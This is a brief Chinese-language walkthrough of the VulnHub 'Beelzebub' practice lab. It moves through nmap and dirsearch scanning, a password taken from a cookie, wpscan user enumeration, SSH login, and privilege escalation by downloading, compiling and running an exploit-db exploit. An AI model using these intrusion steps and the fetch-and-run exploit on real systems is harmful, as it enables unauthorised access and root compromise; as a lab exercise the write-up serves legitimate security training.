vuhub Beelzebub靶场攻略

靶场下载：

下载地址：https://download.vulnhub.com/beelzebub/Beelzebub.zip

靶场攻略：

主机发现：

nmap 192.168.163.1/24

端口扫描：

nmap -p-65535 -A 192.168.163.152

发现没有额外端口。

页面扫描：

dirsearch -u http://192.168.163.152/

挨个登录一下扫到的页面，就两个有用的：

phpinfo.php

/index.php/login/

右键查看源代码

他说把beelzebub进行base64解码

解码出来时一串字符，看别的攻略是要我们拼接到路径后面，然后进行页面扫描

dirsearch -u http://192.168.163.152/d18e1e22becbd915b45e0e655429d487

我们发现这是一个wordpress的cms框架，挨个访问一下扫到的页面：其中有用的有

发现了一个留言板：

F12查看cookie找到了password为M4k3Ad3a1

扫描wordpress漏洞

有密码，但是没账号，账号到哪里找呢？

我们结合之前的信息，这是一个wordpress的cms框架，那么我们可以试着扫描一下有没有框架漏洞。工具webscan

wpscan --url=http://192.168.251.229/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force  -e --plugins-detection aggressive

扫描出来了两个账号。

挨个试一下，登录ssh，成功登录：

history查看历史命令

发现其中有前辈们提权的步骤，那太好了，我们照着做就行了

wget https://www.exploit-db.com/download/47009
 mv 47009 ./exploit.c
 gcc exploit.c -o exploit
 ./exploit